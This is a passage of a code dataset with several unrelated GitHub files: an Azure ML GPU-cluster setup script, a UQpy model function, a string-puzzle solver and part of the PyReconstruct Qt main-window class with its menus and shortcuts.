[\"<\", \"MULTI\", 10, 10, 10, 80]\nBUTTON_PLAYING_TWOPLMODE_P1RIGHT = [\">\", \"MULTI\", 10, 10, 25, 80]\nBUTTON_PLAYING_TWOPLMODE_P2LEFT = [\"<\", \"MULTI\", 10, 10, 100, 80]\nBUTTON_PLAYING_TWOPLMODE_P2RIGHT = [\">\", \"MULTI\", 10, 10, 115, 80]","repo_name":"MagAcademy30/LytiyGonhic-archive","sub_path":"0.5v/labels.py","file_name":"labels.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34308570166","text":"import os\nfrom azureml.core import Workspace\nfrom azureml.core.compute import ComputeTarget, AmlCompute\nfrom azureml.core.compute_target import ComputeTargetException\nfrom azureml.core.authentication import InteractiveLoginAuthentication\n\n# try:\nTENANT_ID = os.getenv(\"TENANT_ID\")\ninteractive_auth = InteractiveLoginAuthentication(tenant_id=TENANT_ID)\n# except:\n# print(\"Need to export TENANT_ID, and get if from 'az account show --output table'!\")\n\n\nws = Workspace.from_config()\n\n# Choose a name for your GPU cluster\ngpu_cluster_name = \"gpu-nc12\"\n\n# Verify that the cluster does not exist already\ntry:\n gpu_cluster = ComputeTarget(workspace=ws, name=gpu_cluster_name)\n print('Found existing cluster, use it.')\nexcept ComputeTargetException:\n compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_NC12',\n idle_seconds_before_scaledown=1200,\n min_nodes=0,\n max_nodes=1)\n gpu_cluster = ComputeTarget.create(ws, gpu_cluster_name, 
{"seq_id":"74204953067","text":"import numpy as np\nimport sys\n\n\ndef RunPythonModel(samples):\n\n    qoi = list()\n    beta = 3.0902\n    for i in range(samples.shape[0]):\n        # use row i of the sample array (the original indexed row 0 for every sample)\n        qoi.append(-1/np.sqrt(2) * (samples[i, 0] + samples[i, 1]) + beta)\n    return qoi\n","repo_name":"chuanzhidong/UQpy","sub_path":"example/SubsetSimulation/SubsetSimulation_Example1/pfn.py","file_name":"pfn.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"37250507498","text":"from itertools import combinations\nimport re\n\ndef get_pairs(s):\n    s = set(s)\n    comb = combinations(s, 2)\n    d = dict()\n    for c in comb:\n        # characters to strip so that only the pair c remains\n        d[c] = ''.join(list(s - set(c)))\n    return d\n\ndef remove_chars(s, chars):\n    return re.sub('[' + chars + ']', '', s)\n\ndef is_valid(s):\n    # valid when no character appears twice in a row\n    return re.search(r'(.)\\\\1', s) is None\n\ndef twoCharacters(s):\n    pairs = get_pairs(s)\n    ma = 0\n    for pair, left_chars in pairs.items():\n        word = remove_chars(s, left_chars)\n        if is_valid(word):\n            ma = max(ma, len(word))\n    return ma\n\n\n# print(get_pairs(\"aaabcd\"))\n# print(remove_chars(\"abcdab\", 'ba'))\n# print(is_valid('abch'))\nprint(twoCharacters(\"abcadd\"))\n","repo_name":"vadim-ivlev/STUDY","sub_path":"coding/pass.py","file_name":"pass.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6649559772","text":"import os\nimport sys\nimport time\nfrom datetime import datetime\nimport json\nimport subprocess\n\nfrom PySide6.QtWidgets import (\n    QMainWindow, \n    QInputDialog, \n    QApplication,\n    QMessageBox, \n    QMenu\n)\nfrom PySide6.QtGui import (\n    QKeySequence,\n    QShortcut,\n    QPixmap\n)\nfrom PySide6.QtCore import Qt, QSettings\n\nfrom .field_widget import FieldWidget\n\nfrom PyReconstruct.modules.gui.palette import MousePalette, ZarrPalette\nfrom PyReconstruct.modules.gui.dialog import (\n    AlignmentDialog,\n    GridDialog,\n    CreateZarrDialog,\n    TrainDialog,\n    SegmentDialog,\n    PredictDialog,\n    QuickDialog,\n    FileDialog\n)\nfrom PyReconstruct.modules.gui.popup import TextWidget, CustomPlotter\nfrom PyReconstruct.modules.gui.utils import (\n    populateMenuBar,\n    populateMenu,\n    notify,\n    saveNotify,\n    unsavedNotify,\n    setMainWindow,\n    noUndoWarning\n)\nfrom PyReconstruct.modules.gui.table import HistoryTableWidget, CopyTableWidget, HelpWidget\nfrom PyReconstruct.modules.backend.func import (\n    xmlToJSON,\n    jsonToXML,\n    importTransforms,\n    importSwiftTransforms\n)\nfrom PyReconstruct.modules.backend.autoseg import seriesToZarr, seriesToLabels, labelsToObjects\nfrom PyReconstruct.modules.datatypes import Series, Transform, Flag\nfrom PyReconstruct.modules.constants import welcome_series_dir, assets_dir, img_dir\n\nclass MainWindow(QMainWindow):\n\n    def __init__(self, filename):\n        \"\"\"Constructs the skeleton for an empty main window.\"\"\"\n        super().__init__() # initialize QMainWindow\n        self.setWindowTitle(\"PyReconstruct\")\n\n        # catch all exceptions and display error message\n        def customExcepthook(exctype, value, traceback):\n            \"\"\"\n            Global exception hook to display a notification window.\n            \"\"\"\n            message = f\"An error occurred: {str(value)}\\n(see console)\"\n            
QMessageBox.critical(None, \"Error\", message, QMessageBox.Ok)\n sys.__excepthook__(exctype, value, traceback) # Call the default exception hook\n\n # Set the exception hook\n sys.excepthook = customExcepthook\n\n # set the window icon\n pix = QPixmap(os.path.join(img_dir, \"PyReconstruct.ico\"))\n self.setWindowIcon(pix)\n\n # set the main window to be slightly less than the size of the monitor\n screen = QApplication.primaryScreen()\n screen_rect = screen.size()\n x = 50\n y = 80\n w = screen_rect.width() - 100\n h = screen_rect.height() - 160\n self.setGeometry(x, y, w, h)\n\n # misc defaults\n self.series = None\n self.series_data = None\n self.field = None # placeholder for field\n self.menubar = None\n self.mouse_palette = None # placeholder for palettes\n self.zarr_palette = None\n self.viewer = None\n self.shortcuts_widget = None\n self.setMouseTracking(True) # set constant mouse tracking for various mouse modes\n self.is_zooming = False\n self.restart_mainwindow = False\n try: # os.getlogin() fails on TACC\n self.user = os.getlogin()\n except:\n self.user = \"\"\n\n # create status bar at bottom of window\n self.statusbar = self.statusBar()\n\n # open the series requested from command line\n if filename and os.path.isfile(filename):\n self.openSeries(jser_fp=filename)\n else:\n welcome_series = Series(\n os.path.join(\n welcome_series_dir,\n \"welcome.ser\"\n ),\n {0: \"welcome.0\"}\n )\n welcome_series.src_dir = os.path.dirname(welcome_series_dir) # set the images directory for the welcome series\n self.openSeries(welcome_series)\n \n self.field.generateView()\n\n # create menu and shortcuts\n self.createMenuBar()\n self.createContextMenus()\n self.createShortcuts()\n\n # set the main window as the parent of the progress bar\n setMainWindow(self)\n\n self.show()\n\n # prompt the user for a username\n self.changeUsername()\n\n def createMenuBar(self):\n \"\"\"Create the menu for the main window.\"\"\"\n menu = [\n \n {\n \"attr_name\": \"filemenu\",\n \"text\": \"File\",\n \"opts\":\n [ \n {\n \"attr_name\": \"newseriesmenu\",\n \"text\": \"New\",\n \"opts\":\n [\n (\"newfromimages_act\", \"From images...\", \"Ctrl+N\", self.newSeries),\n (\"newfromzarr_act\", \"From zarr...\", \"\", lambda : self.newSeries(from_zarr=True)),\n (\"newfromxml_act\", \"From legacy .ser...\", \"\", self.newFromXML)\n ]\n },\n (\"open_act\", \"Open\", \"Ctrl+O\", self.openSeries),\n None, # None acts as menu divider\n (\"save_act\", \"Save\", \"Ctrl+S\", self.saveToJser),\n (\"saveas_act\", \"Save as...\", \"\", self.saveAsToJser),\n (\"backup_act\", \"Auto-backup series\", \"checkbox\", self.autoBackup),\n None,\n (\"username_act\", \"Change username...\", \"\", self.changeUsername),\n None,\n (\"restart_act\", \"Reload\", \"Ctrl+R\", self.restart),\n (\"quit_act\", \"Quit\", \"Ctrl+Q\", self.close),\n ]\n },\n\n {\n \"attr_name\": \"editmenu\",\n \"text\": \"Edit\",\n \"opts\":\n [\n (\"undo_act\", \"Undo\", \"Ctrl+Z\", self.field.undoState),\n (\"redo_act\", \"Redo\", \"Ctrl+Y\", self.field.redoState),\n None,\n (\"cut_act\", \"Cut\", \"Ctrl+X\", self.field.cut),\n (\"copy_act\", \"Copy\", \"Ctrl+C\", self.copy),\n (\"paste_act\", \"Paste\", \"Ctrl+V\", self.field.paste),\n (\"pasteattributes_act\", \"Paste attributes\", \"Ctrl+B\", self.field.pasteAttributes),\n None,\n (\"pastetopalette_act\", \"Paste attributes to palette\", \"Shift+G\", self.pasteAttributesToPalette),\n (\"pastetopalettewithshape_act\", \"Paste attributes to palette (include shape)\", \"Ctrl+Shift+G\", lambda : 
self.pasteAttributesToPalette(True)),\n None,\n {\n \"attr_name\": \"bcmenu\",\n \"text\": \"Brightness/contrast\",\n \"opts\":\n [\n (\"incbr_act\", \"Increase brightness\", \"=\", lambda : self.editImage(option=\"brightness\", direction=\"up\")),\n (\"decbr_act\", \"Decrease brightness\", \"-\", lambda : self.editImage(option=\"brightness\", direction=\"down\")),\n (\"inccon_act\", \"Increase contrast\", \"]\", lambda : self.editImage(option=\"contrast\", direction=\"up\")),\n (\"deccon_act\", \"Decrease contrast\", \"[\", lambda : self.editImage(option=\"contrast\", direction=\"down\"))\n ]\n }\n ]\n },\n\n {\n \"attr_name\": \"seriesmenu\",\n \"text\": \"Series\",\n \"opts\":\n [\n {\n \"attr_name\": \"importmenu\",\n \"text\": \"Import\",\n \"opts\":\n [\n {\n \"attr_name\": \"importjser\",\n \"text\": \"From jser file\",\n \"opts\":\n [\n (\"importtraces_act\", \"Traces...\", \"\", self.importTraces),\n (\"importzrtraces_act\", \"Z-traces...\", \"\", self.importZtraces),\n (\"importflags_act\", \"Flags...\", \"\", self.importFlags),\n (\"importtracepalette_act\", \"Trace palette...\", \"\", self.importTracePalette),\n (\"importseriestransforms_act\", \"Image transforms...\", \"\", self.importSeriesTransforms),\n (\"importbc_act\", \"Brightness/contrast...\", \"\", self.importBC)\n ]\n }\n ]\n\t\t },\n\t\t {\n \"attr_name\": \"exportmenu\",\n \"text\": \"Export\",\n \"opts\":\n [\n (\"exportjser_act\", \"as backup jser...\", \"Ctrl+Shift+B\", self.manualBackup),\n (\"exportxml_act\", \"as legacy XML series...\", \"\", self.exportToXML)\n ]\n\t\t },\n\t\t {\n \"attr_name\": \"imagesmenu\",\n \"text\": \"Images\",\n \"opts\":\n [\n (\"change_src_act\", \"Find/change image directory\", \"\", self.changeSrcDir),\n (\"zarrimage_act\", \"Convert to zarr\", \"\", self.srcToZarr),\n (\"scalezarr_act\", \"Update zarr scales\", \"\", lambda : self.srcToZarr(create_new=False))\n ]\n },\n\t\t {\n \"attr_name\": \"listsmenu\",\n \"text\": \"Lists / History\",\n \"opts\":\n [\n (\"objectlist_act\", \"Object list\", \"Ctrl+Shift+O\", self.openObjectList),\n (\"ztracelist_act\", \"Z-trace list\", \"Ctrl+Shift+Z\", self.openZtraceList),\n (\"flaglist_act\", \"Flag list\", \"\", self.openFlagList),\n (\"history_act\", \"View series history\", \"\", self.viewSeriesHistory),\n ]\n },\n {\n \"attr_name\": \"alignmentsmenu\",\n \"text\": \"Alignments\",\n \"opts\":\n [\n {\n \"attr_name\": \"importmenu\",\n \"text\": \"Import alignments\",\n \"opts\":\n [\n (\"importjsertransforms_act\", \"jser file\", \"\", self.importSeriesTransforms),\n (\"importtransforms_act\", \".txt file\", \"\", self.importTransforms),\n (\"import_swift_transforms_act\", \"SWiFT project\", \"\", self.importSwiftTransforms),\n ]\n },\n (\"changealignment_act\", \"Change alignment\", \"Ctrl+Shift+A\", self.changeAlignment),\n {\n \"attr_name\": \"propagatemenu\",\n \"text\": \"Propagate transform\",\n \"opts\":\n [\n (\"startpt_act\", \"Start propagation recording\", \"\", lambda : self.field.setPropagationMode(True)),\n (\"endpt_act\", \"End propagation recording\", \"\", lambda : self.field.setPropagationMode(False)),\n None,\n (\"proptostart_act\", \"Propagate to start\", \"\", lambda : self.field.propagateTo(False)),\n (\"proptoend_act\", \"Propagate to end\", \"\", lambda : self.field.propagateTo(True))\n ]\n }\n ]\n },\n {\n \"attr_name\": \"serieshidemenu\",\n \"text\": \"Hide\",\n \"opts\":\n [\n (\"hidealltraces_act\", \"Hide all traces\", \"\", self.hideSeriesTraces),\n (\"unhidealltraces_act\", \"Unhide all traces\", \"\", 
lambda : self.hideSeriesTraces(hidden=False))\n ]\n },\n\t\t {\n \"attr_name\": \"threedeemenu\",\n \"text\": \"3D\",\n \"opts\":\n [\n (\"smoothing_act\", \"Change smoothing type...\", \"\", self.edit3DSmoothing),\n ]\n },\n {\n \"attr_name\": \"traepalette_menu\",\n \"text\": \"Trace Palette\",\n \"opts\":\n [\n (\"modifytracepalette_act\", \"All palettes...\", \"Ctrl+Shift+P\", self.mouse_palette.modifyAllPaletteButtons),\n (\"resetpalette_act\", \"Reset current palette\", \"\", self.resetTracePalette)\n ]\n },\n None,\n (\"findobjectfirst_act\", \"Find first object contour...\", \"Ctrl+F\", self.findObjectFirst),\n (\"removeduplicates_act\", \"Remove duplicate traces\", \"\", self.deleteDuplicateTraces),\n (\"calibrate_act\", \"Calibrate pixel size...\", \"\", self.calibrateMag),\n ]\n },\n \n {\n \"attr_name\": \"sectionmenu\",\n \"text\": \"Section\",\n \"opts\":\n [\n (\"nextsection_act\", \"Next section\", \"PgUp\", self.incrementSection),\n (\"prevsection_act\", \"Previous section\", \"PgDown\", lambda : self.incrementSection(down=True)),\n None,\n (\"sectionlist_act\", \"Section list\", \"Ctrl+Shift+S\", self.openSectionList),\n (\"goto_act\", \"Go to section\", \"Ctrl+G\", self.changeSection),\n (\"changetform_act\", \"Change transformation\", \"Ctrl+T\", self.changeTform),\n None,\n (\"tracelist_act\", \"Trace list\", \"Ctrl+Shift+T\", self.openTraceList),\n (\"findcontour_act\", \"Find contour...\", \"Ctrl+Shift+F\", self.field.findContourDialog),\n None,\n (\"unlocksection_act\", \"Unlock current section\", \"Ctrl+Shift+U\", self.field.unlockSection),\n (\"linearalign_act\", \"Align linear\", \"\", self.field.linearAlign),\n # (\"quickalign_act\", \"Auto-align\", \"Ctrl+\\\\\", self.field.quickAlign)\n ]\n },\n\n {\n \"attr_name\": \"viewmenu\",\n \"text\": \"View\",\n \"opts\":\n [\n (\"fillopacity_act\", \"Edit fill opacity...\", \"\", self.setFillOpacity),\n None,\n (\"homeview_act\", \"Set view to image\", \"Home\", self.field.home),\n (\"viewmag_act\", \"View magnification...\", \"\", self.field.setViewMagnification),\n (\"findview_act\", \"Set zoom for finding contours...\", \"\", self.setFindZoom),\n None,\n (\"toggleztraces_act\", \"Toggle show Z-traces\", \"\", self.toggleZtraces),\n None,\n {\n \"attr_name\": \"togglepalettemenu\",\n \"text\": \"Toggle palette\",\n \"opts\":\n [\n (\"togglepalette_act\", \"Trace palette\", \"checkbox\", self.mouse_palette.togglePalette),\n (\"toggleinc_act\", \"Section increment buttons\", \"checkbox\", self.mouse_palette.toggleIncrement),\n (\"togglebc_act\", \"Brightness/contrast sliders\", \"checkbox\", self.mouse_palette.toggleBC),\n\n ]\n },\n (\"resetpalette_act\", \"Reset palette position\", \"\", self.mouse_palette.resetPos),\n None,\n (\"togglecuration_act\", \"Toggle curation in object lists\", \"Ctrl+Shift+C\", self.toggleCuration)\n ]\n },\n {\n \"attr_name\": \"autosegmenu\",\n \"text\": \"Autosegment\",\n \"opts\":\n [\n (\"export_zarr_act\", \"Export to zarr...\", \"\", self.exportToZarr),\n (\"trainzarr_act\", \"Train...\", \"\", self.train),\n (\"retrainzarr_act\", \"Retrain...\", \"\", lambda : self.train(retrain=True)),\n (\"predictzarr_act\", \"Predict (infer)...\", \"\", self.predict),\n (\"sementzarr_act\", \"Segment...\", \"\", self.segment),\n {\n \"attr_name\": \"zarrlayermenu\",\n \"text\": \"Zarr layer\",\n \"opts\":\n [\n (\"setzarrlayer_act\", \"Set zarr layer...\", \"\", self.setZarrLayer),\n (\"removezarrlayer_act\", \"Remove zarr layer\", \"\", self.removeZarrLayer)\n ]\n }\n ]\n },\n {\n 
\"attr_name\": \"helpmenu\",\n \"text\": \"Help\",\n \"opts\":\n [\n (\"shortcutshelp_act\", \"Shortcuts list\", \"?\", self.displayShortcuts)\n ]\n }\n ]\n\n if self.menubar:\n self.menubar.close()\n\n # Populate menu bar with menus and options\n self.menubar = self.menuBar()\n self.menubar.setNativeMenuBar(False)\n populateMenuBar(self, self.menubar, menu)\n \n def createContextMenus(self):\n \"\"\"Create the right-click menus used in the field.\"\"\"\n field_menu_list = [\n (\"edittrace_act\", \"Edit attributes...\", \"Ctrl+E\", self.field.traceDialog),\n {\n \"attr_name\": \"modifymenu\",\n \"text\": \"Modify\",\n \"opts\":\n [\n (\"mergetraces_act\", \"Merge traces\", \"Ctrl+M\", self.field.mergeSelectedTraces),\n (\"mergeobjects_act\", \"Merge attributes...\", \"Ctrl+Shift+M\", lambda : self.field.mergeSelectedTraces(merge_attrs=True)),\n None,\n (\"makenegative_act\", \"Make negative\", \"\", self.field.makeNegative),\n (\"makepositive_act\", \"Make positive\", \"\", lambda : self.field.makeNegative(False)),\n # None,\n # (\"markseg_act\", \"Add to good segmentation group\", \"Shift+G\", self.markKeep)\n ]\n },\n {\n \"attr_name\": \"curatemenu\",\n \"text\": \"Set curation\",\n \"opts\":\n [\n (\"blankcurate_act\", \"Blank\", \"\", lambda : self.field.setCuration(\"\")),\n (\"needscuration_act\", \"Needs curation\", \"\", lambda : self.field.setCuration(\"Needs curation\")),\n (\"curated_act\", \"Curated\", \"\", lambda : self.field.setCuration(\"Curated\"))\n ]\n },\n None,\n {\n \"attr_name\": \"viewmenu\",\n \"text\": \"View\",\n \"opts\":\n [\n (\"hidetraces_act\", \"Hide traces\", \"Ctrl+H\", self.field.hideTraces),\n (\"unhideall_act\", \"Unhide all traces\", \"Ctrl+U\", self.field.unhideAllTraces),\n None,\n (\"hideall_act\", \"Toggle hide all\", \"H\", self.field.toggleHideAllTraces),\n (\"showall_act\", \"Toggle show all\", \"A\", self.field.toggleShowAllTraces),\n None,\n (\"hideimage_act\", \"Toggle hide image\", \"I\", self.field.toggleHideImage),\n (\"blend_act\", \"Toggle section blend\", \" \", self.field.toggleBlend),\n ]\n },\n None,\n self.cut_act,\n self.copy_act,\n self.paste_act,\n self.pasteattributes_act,\n None,\n (\"selectall_act\", \"Select all traces\", \"Ctrl+A\", self.field.selectAllTraces),\n (\"deselect_act\", \"Deselect traces\", \"Ctrl+D\", self.field.deselectAllTraces),\n None,\n (\"createflag_act\", \"Create flag...\", \"\", self.field.createTraceFlag),\n None,\n (\"deletetraces_act\", \"Delete traces\", \"Del\", self.backspace)\n ]\n self.field_menu = QMenu(self)\n populateMenu(self, self.field_menu, field_menu_list)\n\n # organize actions\n self.trace_actions = [\n self.edittrace_act,\n self.modifymenu,\n self.mergetraces_act,\n self.makepositive_act,\n self.makenegative_act,\n self.hidetraces_act,\n self.cut_act,\n self.copy_act,\n self.pasteattributes_act,\n self.createflag_act\n ]\n self.ztrace_actions = [\n self.edittrace_act\n ]\n\n # create the label menu\n label_menu_list = [\n (\"importlabels_act\", \"Import label(s)\", \"\", self.importLabels),\n (\"mergelabels_act\", \"Merge labels\", \"\", self.mergeLabels)\n ]\n self.label_menu = QMenu(self)\n populateMenu(self, self.label_menu, label_menu_list)\n \n def checkActions(self, context_menu=False, clicked_trace=None, clicked_label=None):\n \"\"\"Check for actions that should be enabled or disabled\n \n Params:\n context_menu (bool): True if context menu is being generated\n clicked_trace (Trace): the trace that was clicked on IF the cotext menu is being generated\n \"\"\"\n # if both 
traces and ztraces are highlighted or nothing is highlighted, only allow general field options\n if not (bool(self.field.section.selected_traces) ^ \n bool(self.field.section.selected_ztraces)\n ):\n for a in self.trace_actions:\n a.setEnabled(False)\n for a in self.ztrace_actions:\n a.setEnabled(False)\n # if selected trace in highlighted traces\n elif ((not context_menu and self.field.section.selected_traces) or\n (context_menu and clicked_trace in self.field.section.selected_traces)\n ):\n for a in self.ztrace_actions:\n a.setEnabled(False)\n for a in self.trace_actions:\n a.setEnabled(True)\n # if selected ztrace in highlighted ztraces\n elif ((not context_menu and self.field.section.selected_ztraces) or\n (context_menu and clicked_trace in self.field.section.selected_ztraces)\n ):\n for a in self.trace_actions:\n a.setEnabled(False)\n for a in self.ztrace_actions:\n a.setEnabled(True)\n else:\n for a in self.trace_actions:\n a.setEnabled(False)\n for a in self.ztrace_actions:\n a.setEnabled(False)\n \n # check for objects (to allow merging)\n names = set()\n for trace in self.field.section.selected_traces:\n names.add(trace.name)\n if len(names) > 1:\n self.mergeobjects_act.setEnabled(True)\n else:\n self.mergeobjects_act.setEnabled(False)\n\n # check labels\n if clicked_label:\n if clicked_label in self.field.zarr_layer.selected_ids:\n self.importlabels_act.setEnabled(True)\n if len(self.zarr_layer.selected_ids) > 1:\n self.mergelabels_act.setEnabled(True)\n else:\n self.importlabels_act.setEnabled(False)\n self.mergelabels_act.setEnabled(False)\n \n # MENUBAR\n\n # disable saving for welcome series\n is_not_welcome_series = not self.series.isWelcomeSeries()\n self.save_act.setEnabled(is_not_welcome_series)\n self.saveas_act.setEnabled(is_not_welcome_series)\n self.backup_act.setEnabled(is_not_welcome_series)\n\n # check for backup directory\n self.backup_act.setChecked(bool(self.series.options[\"backup_dir\"]))\n\n # check for palette\n self.togglepalette_act.setChecked(not self.mouse_palette.palette_hidden)\n self.toggleinc_act.setChecked(not self.mouse_palette.inc_hidden)\n self.togglebc_act.setChecked(not self.mouse_palette.bc_hidden)\n\n # undo/redo\n states = self.field.series_states[self.series.current_section]\n has_undo_states = bool(states.undo_states) or self.field.is_line_tracing\n has_redo_states = bool(states.redo_states)\n self.undo_act.setEnabled(has_undo_states)\n self.redo_act.setEnabled(has_redo_states)\n\n # check clipboard for paste options\n if self.field.clipboard:\n self.paste_act.setEnabled(True)\n else:\n self.paste_act.setEnabled(False)\n self.pasteattributes_act.setEnabled(False)\n\n # zarr images\n self.zarrimage_act.setEnabled(not self.field.section_layer.is_zarr_file)\n self.scalezarr_act.setEnabled(self.field.section_layer.is_zarr_file)\n\n # calibrate\n self.calibrate_act.setEnabled(bool(self.field.section.selected_traces))\n\n # zarr layer\n self.removezarrlayer_act.setEnabled(bool(self.series.zarr_overlay_fp))\n\n def createShortcuts(self):\n \"\"\"Create shortcuts that are NOT included in any menus.\"\"\"\n # domain translate motions\n shortcuts = [\n (\"Backspace\", self.backspace),\n\n (\"/\", self.flickerSections),\n\n (\"Ctrl+Left\", lambda : self.translate(\"left\", \"small\")),\n (\"Left\", lambda : self.translate(\"left\", \"med\")),\n (\"Shift+Left\", lambda : self.translate(\"left\", \"big\")),\n (\"Ctrl+Right\", lambda : self.translate(\"right\", \"small\")),\n (\"Right\", lambda : self.translate(\"right\", \"med\")),\n (\"Shift+Right\", 
lambda : self.translate(\"right\", \"big\")),\n (\"Ctrl+Up\", lambda : self.translate(\"up\", \"small\")),\n (\"Up\", lambda : self.translate(\"up\", \"med\")),\n (\"Shift+Up\", lambda : self.translate(\"up\", \"big\")),\n (\"Ctrl+Down\", lambda : self.translate(\"down\", \"small\")),\n (\"Down\", lambda : self.translate(\"down\", \"med\")),\n (\"Shift+Down\", lambda : self.translate(\"down\", \"big\")),\n\n (\"Ctrl+Shift+Left\", self.field.rotateTform),\n (\"Ctrl+Shift+Right\", lambda : self.field.rotateTform(cc=False))\n ]\n\n for kbd, act in shortcuts:\n QShortcut(QKeySequence(kbd), self).activated.connect(act)\n \n def createPaletteShortcuts(self):\n \"\"\"Create shortcuts associate with the mouse palette.\"\"\"\n # trace palette shortcuts (1-20)\n trace_shortcuts = []\n for i in range(1, 21):\n sc_str = \"\"\n if (i-1) // 10 > 0:\n sc_str += \"Shift+\"\n sc_str += str(i % 10)\n s_switch = (\n sc_str,\n lambda pos=i-1 : self.mouse_palette.activatePaletteButton(pos)\n )\n s_modify = (\n \"Ctrl+\" + sc_str,\n lambda pos=i-1 : self.mouse_palette.modifyPaletteButton(pos)\n )\n trace_shortcuts.append(s_switch)\n trace_shortcuts.append(s_modify)\n \n # mouse mode shortcuts (F1-F8)\n mode_shortcuts = [\n (\"p\", lambda : self.mouse_palette.activateModeButton(\"Pointer\")),\n (\"z\", lambda : self.mouse_palette.activateModeButton(\"Pan/Zoom\")),\n (\"k\", lambda : self.mouse_palette.activateModeButton(\"Knife\")),\n (\"c\", lambda : self.mouse_palette.activateModeButton(\"Closed Trace\")),\n (\"o\", lambda : self.mouse_palette.activateModeButton(\"Open Trace\")),\n (\"s\", lambda : self.mouse_palette.activateModeButton(\"Stamp\")),\n (\"g\", lambda : self.mouse_palette.activateModeButton(\"Grid\")),\n (\"f\", lambda : self.mouse_palette.activateModeButton(\"Flag\"))\n ]\n \n for kbd, act in (mode_shortcuts + trace_shortcuts):\n QShortcut(QKeySequence(kbd), self).activated.connect(act)\n \n def changeSrcDir(self, new_src_dir : str = None, notify=False):\n \"\"\"Open a series of dialogs to change the image source directory.\n \n Params:\n new_src_dir (str): the new image directory\n notify (bool): True if user is to be notified with a pop-up\n \"\"\"\n if notify:\n reply = QMessageBox.question(\n self,\n \"Images Not Found\",\n \"Images not found.\\nWould you like to locate them?\",\n QMessageBox.Yes,\n QMessageBox.No\n )\n if reply == QMessageBox.No:\n return\n if new_src_dir is None:\n new_src_dir = FileDialog.get(\n \"dir\",\n self,\n \"Select folder containing images\",\n )\n if not new_src_dir: return\n \n self.series.src_dir = new_src_dir\n if self.field:\n self.field.reloadImage()\n self.seriesModified(True)\n \n # prompt user to scale zarr images if not scaled\n if (self.field.section_layer.image_found and \n self.field.section_layer.is_zarr_file and\n not self.field.section_layer.is_scaled):\n reply = QMessageBox.question(\n self,\n \"Zarr Scaling\",\n \"Zarr file not scaled.\\nWould you like to update the zarr with scales?\",\n QMessageBox.Yes,\n QMessageBox.No\n )\n if reply == QMessageBox.Yes:\n self.srcToZarr(create_new=False)\n \n def srcToZarr(self, create_new=True):\n \"\"\"Convert the series images to zarr.\"\"\"\n if not self.field.section_layer.image_found:\n notify(\"Images not found.\")\n return\n \n if self.field.section_layer.is_zarr_file and create_new:\n notify(\"Images are already in zarr format.\")\n return\n elif not self.field.section_layer.is_zarr_file and not create_new:\n notify(\"Images are not in zarr format.\\nPlease convert to zarr first.\")\n return\n \n if 
create_new:\n zarr_fp = FileDialog.get(\n \"save\",\n self,\n \"Convert Images to Zarr\",\n file_name=f\"{self.series.name}_images.zarr\",\n filter=\"Zarr Directory (*.zarr)\"\n )\n if not zarr_fp: return\n\n python_bin = sys.executable\n zarr_converter = os.path.join(assets_dir, \"scripts\", \"convert_zarr\", \"start_process.py\")\n if create_new:\n convert_cmd = [python_bin, zarr_converter, self.series.src_dir, zarr_fp]\n else:\n convert_cmd = [python_bin, zarr_converter, self.series.src_dir]\n\n if os.name == 'nt':\n\n subprocess.Popen(convert_cmd, creationflags=subprocess.CREATE_NO_WINDOW)\n \n else:\n\n convert_cmd = \" \".join(convert_cmd)\n subprocess.Popen(convert_cmd, shell=True, stdout=None, stderr=None)\n\n def changeUsername(self, new_name : str = None):\n \"\"\"Edit the login name used to track history.\n \n Params:\n new_name (str): the new username\n \"\"\"\n if new_name is None:\n new_name, confirmed = QInputDialog.getText(\n self,\n \"Username\",\n \"Enter your username:\",\n text=QSettings(\"KHLab\", \"PyReconstruct\").value(\"username\", self.series.user),\n )\n if not confirmed or not new_name:\n return\n \n QSettings(\"KHLab\", \"PyReconstruct\").setValue(\"username\", new_name)\n self.user = new_name\n self.series.user = new_name\n \n def setFillOpacity(self, opacity : float = None):\n \"\"\"Set the opacity of the trace highlight.\n \n Params:\n opacity (float): the new fill opacity\n \"\"\"\n if opacity is None:\n opacity, confirmed = QInputDialog.getText(\n self,\n \"Fill Opacity\",\n \"Enter fill opacity (0-1):\",\n text=str(round(self.series.options[\"fill_opacity\"], 3))\n )\n if not confirmed:\n return\n \n try:\n opacity = float(opacity)\n except ValueError:\n return\n \n if not (0 <= opacity <= 1):\n return\n \n self.series.options[\"fill_opacity\"] = opacity\n self.field.generateView(generate_image=False)\n\n def openSeries(self, series_obj=None, jser_fp=None):\n \"\"\"Open an existing series and create the field.\n \n Params:\n series_obj (Series): the series object (optional)\n \"\"\"\n if not series_obj: # if series is not provided \n # get the new series\n new_series = None\n if not jser_fp:\n jser_fp = FileDialog.get(\"file\", self, \"Open Series\", filter=\"*.jser\")\n if not jser_fp: return # exit function if user does not provide series\n \n # user has opened an existing series\n if self.series:\n response = self.saveToJser(notify=True)\n if response == \"cancel\":\n return\n\n # check for a hidden series folder\n sdir = os.path.dirname(jser_fp)\n sname = os.path.basename(jser_fp)\n sname = sname[:sname.rfind(\".\")]\n hidden_series_dir = os.path.join(sdir, f\".{sname}\")\n\n if os.path.isdir(hidden_series_dir):\n # find the series and timer files\n new_series_fp = \"\"\n sections = {}\n for f in os.listdir(hidden_series_dir):\n # check if the series is currently being modified\n if \".\" not in f:\n current_time = round(time.time())\n time_diff = current_time - int(f)\n if time_diff <= 7: # the series is currently being operated on\n QMessageBox.information(\n self,\n \"Series In Use\",\n \"This series is already open in another window.\",\n QMessageBox.Ok\n )\n if not self.series:\n exit()\n else:\n return\n else:\n ext = f[f.rfind(\".\")+1:]\n if ext.isnumeric():\n sections[int(ext)] = f\n elif ext == \"ser\":\n new_series_fp = os.path.join(hidden_series_dir, f) \n\n # if a series file has been found\n if new_series_fp:\n # ask the user if they want to open the unsaved series\n open_unsaved = unsavedNotify()\n if open_unsaved:\n new_series = 
